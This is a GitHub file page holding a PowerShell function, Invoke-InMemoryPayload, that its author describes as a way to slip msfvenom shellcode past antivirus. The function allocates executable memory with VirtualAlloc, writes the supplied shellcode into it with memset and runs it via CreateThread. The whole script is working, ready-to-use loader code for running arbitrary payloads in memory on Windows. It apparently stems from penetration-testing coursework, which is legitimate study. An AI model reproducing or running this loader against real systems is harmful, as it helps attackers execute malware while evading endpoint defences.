-
Notifications
You must be signed in to change notification settings - Fork 92
/
Invoke-InMemoryPayload.ps1
109 lines (75 loc) · 3.59 KB
/
Invoke-InMemoryPayload.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
Function Invoke-InMemoryPayload {
<#
.SYNOPSIS
Injects an msfvenom payload into a Windows machines memory as a way to attempt evading Anti-Virus protections. This was built thanks to information from the Offensive Security PWK Course
.DESCRIPTION
This cmdlet is used to attempt bypassing AV software by injecting shell code in a byte arrary into a separate thread of specially allocated memory. It is possible that this will not be able to execute a certain Windows devices as the DLLs or user permissions may prevent the execution of this function.
.EXAMPLE
Invoke-InMemoryPayload -ShellCode 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
# This command injects NOP bits into a separate thread of specially allocated memory on a Windows machine.
.PARAMETER ShellCode
This parameter accepts byte input only. Qutations should not be used around your defined bytes as this will convert your bytes to strings
.INPUTS
[System.Byte[]]
.OUTPUTS
None
.NOTES
Author: Robert H. Osborne
Alias: tobor
Contact: [email protected]
.LINK
https://osbornepro.com
https://writeups.osbornepro.com
https://encrypit.osbornepro.com
https://btpssecpack.osbornepro.com
https://github.com/tobor88
https://github.com/OsbornePro
https://gitlab.com/tobor88
https://www.powershellgallery.com/profiles/tobor
https://www.linkedin.com/in/roberthosborne/
https://www.credly.com/users/roberthosborne/badges
https://www.hackthebox.eu/profile/52286
#>
[CmdletBinding()]
param(
[Parameter(
Mandatory=$True,
Position=0,
ValueFromPipeline=$True,
ValueFromPipelineByPropertyName=$True,
HelpMessage='Generate an msfvenom payload. Copy the value of the byte variable and place it here.')] # End Parameter
[Byte[]]$ShellCode
) # End param
Write-Verbose -Message "Importing DLL's..."
$CSCode = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
$WinFunc = Add-Type -MemberDefinition $CSCode -Name "Win32" -Namespace "Win32Functions" -PassThru
$Size = 0x1000
If ($ShellCode.Length -gt 0x1000) {
$Size = $ShellCode.Length
Write-Verbose -Message "Length of payload is $Size"
} # End If
Write-Verbose "Allocating a block of memory for execution using VirtualAlloc()..."
$X = $WinFunc::VirtualAlloc(0,$Size,0x3000,0x40)
Write-Verbose -Message "Writing payload to newly allocated memory block using memset()..."
For ( $i = 0 ; $i -le ($ShellCode.Length - 1); $i++ ) {
Try {
$WinFunc::memset([IntPtr]($x.ToInt32()+$i), $ShellCode[$i], 1)
} Catch [Exception] {
Write-Error -Message $Error[0]
Throw "[x] There was an error executing payload. Cmdlet is being prevented from allocating memory with the utilized DLLs."
} Catch {
Throw "[x] I have not caught this error before. Please email me the results at [email protected]"
} # End Try Catch Catch
} # End For
Write-Verbose -Message "Executing in separte thread using CreateThread()..."
$WinFunc::CreateThread(0,0,$X,0,0,0)
For (;;) {
Start-Sleep -Seconds 60
} # End For
} # End Invoke-InMemoryPayload